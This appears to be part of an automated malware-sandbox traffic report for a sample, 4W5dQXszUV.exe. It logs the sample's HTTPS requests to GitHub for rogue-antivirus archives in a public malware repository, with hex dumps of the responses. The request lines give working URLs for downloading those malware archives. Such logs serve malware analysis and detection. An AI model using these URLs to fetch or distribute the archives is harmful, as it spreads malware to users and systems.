                                                                                                        Data Ascii: ;k>_g)aC{kir*c/o@`M1n%![89kkOJ:2BuTV8Y5Z4"I\- XE\q}K9&~$;faCv*qLcuC.NKk3^G3Ii' cxk8dT[%=uH![b3IQ$1
                                                                                                        2022-09-29 12:45:06 UTC676INData Raw: af d3 83 a8 89 7d f3 d3 95 c9 7b ec ef 87 c7 4c 8a fd 37 37 58 eb e5 9a 74 24 15 2b f3 b4 44 c2 49 14 45 97 6b 7d 4d fb 68 63 85 b2 04 83 ac d3 8f 65 1c 69 0a e8 93 1e 9d c8 81 4e 4d 0a 0c ea 10 31 53 5c fd db 24 70 62 6f 64 0e 5a a7 6e ab d1 3c 8b 5e cc b1 fc 1b 55 2f e7 9e d2 fc b7 c6 7f 31 35 4d e8 eb 17 13 75 5f 9c 02 2c fe 34 c9 a2 02 1b ed d5 85 ea 3b 83 02 c5 35 22 f7 7b f3 a7 be 70 f9 42 3b b1 dd 7b 35 3f 3a 82 4e 2e 61 3e 5b af 69 e3 5f 11 44 28 3f 50 7d 77 a9 37 ef 8a 7a 98 20 ab c1 05 2a ef 10 55 88 9d e2 f5 71 a8 3a 3a b3 87 32 2b 93 5d 32 1a 69 6c 87 5a da 55 3e 6e 32 13 68 f9 f1 63 fd 15 e1 ee 50 26 3f 08 f3 34 eb ca 57 da 0a 83 79 b7 d4 cb 55 7a 6e af c6 7d b6 0e 20 71 8e 04 d1 e4 fb 4b dd 72 c0 8d 7c 9f 78 33 20 de db a3 07 9b 5e 2c d4 a6
                                                                                                        Data Ascii: }{L77Xt$+DIEk}MhceiNM1S\$pbodZn<^U/15Mu_,4;5"{pB;{5?:N.a>[i_D(?P}w7z *Uq::2+]2ilZU>n2hcP&?4WyUzn} qKr|x3 ^,
                                                                                                        2022-09-29 12:45:06 UTC692INData Raw: 76 71 b8 e1 5e a2 af 5f b8 db 35 47 91 6e 03 43 b1 f8 d7 10 a7 9d 2f 6c aa a8 c5 8d 41 17 10 52 a9 3e 3a 30 7f 27 82 a6 5a c9 94 77 86 44 5a cc 1f 91 db b4 10 78 a2 98 65 24 a1 93 a2 ba 6e 84 48 46 98 11 41 d5 c8 ed e0 9d af dc 05 ad 79 cc b1 66 bd 92 40 4e d7 0f 32 49 f9 a7 ce 74 b6 50 6f d7 73 2c 07 4b 66 af 25 4a 9b 49 25 20 92 d5 01 d9 7c 65 18 c6 ca db 6b 3e da 99 00 53 80 12 d8 18 69 a8 62 09 6e b9 92 68 01 81 d1 4b 6a 00 29 cf 91 61 3c 3d 34 9a 64 ba 97 cf 32 fd 9c 21 65 35 de b3 c3 df 87 21 6f 55 00 68 02 7b 7b aa 1f 4f 5b 12 e5 e4 46 a9 b6 7e e6 2a 2d 0d a9 c8 25 39 44 e2 43 e8 54 56 72 25 23 97 f7 79 44 a3 37 37 bb c0 71 1b 13 a8 d9 4d d9 9e 42 00 1b 3a 78 a6 6d ff be f9 bb ca 0d a1 9a ee a3 b2 2d cc 9e da 7b 35 db 47 c0 4a f5 3e b3 9f f8 cc eb
                                                                                                        Data Ascii: vq^_5GnC/lAR>:0'ZwDZxe$nHFAyf@N2ItPos,Kf%JI% |ek>SibnhKj)a<=4d2!e5!oUh{{O[F~*-%9DCTVr%#yD77qMB:xm-{5GJ>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.449811140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:44 UTC16041OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:44 UTC16041INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:11 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:44 UTC16042INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.449813140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:44 UTC16043OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:44 UTC16043INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:24 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SE2011.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:44 UTC16044INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.449822140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:46 UTC16046OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:46 UTC16046INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:31 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:46 UTC16047INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.449825140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:47 UTC16048OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:47 UTC16048INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:33 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:47 UTC16049INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.449827140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:49 UTC16051OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:49 UTC16051INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:31 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:49 UTC16052INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.449829140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:49 UTC16053OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:50 UTC16053INHTTP/1.1 404 Not Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:50 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:50 UTC16054INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                        2022-09-29 12:46:50 UTC16056INData Raw: 33 42 39 31 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                                        Data Ascii: 3B91<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                                        2022-09-29 12:46:50 UTC16056INData Raw: 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74
                                                                                                        Data Ascii: <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/asset
                                                                                                        2022-09-29 12:46:50 UTC16057INData Raw: 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74
                                                                                                        Data Ascii: gin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.git
                                                                                                        2022-09-29 12:46:50 UTC16059INData Raw: 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 64 33 35 31 66 36 2d 63 31 64 36 33 64 32 33 30 62 32 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 36 38 38 66 63 32 38 33 66 64 34 2e 6a 73
                                                                                                        Data Ascii: _stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-d351f6-c1d63d230b29.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-0688fc283fd4.js
                                                                                                        2022-09-29 12:46:50 UTC16060INData Raw: 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 33 38 63 33 36 61 35 39 37 31 38 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e
                                                                                                        Data Ascii: _index_js-node_modules_github_time-elements_dist_index_js-38c36a597184.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-elemen
                                                                                                        2022-09-29 12:46:50 UTC16061INData Raw: 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 70 61 73 74 65 2d 6d 61 72 6b 64 6f 77 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6b 6f 64 64 73 73 6f 6e 5f 74 65 78 74 61 72 65 61 2d 63 2d 35 38 36 66 37 38 2d 61 61 64 30 66 61 30 31 63 37 39 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20
                                                                                                        Data Ascii: ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_koddsson_textarea-c-586f78-aad0fa01c792.js"></script><script crossorigin="anonymous"
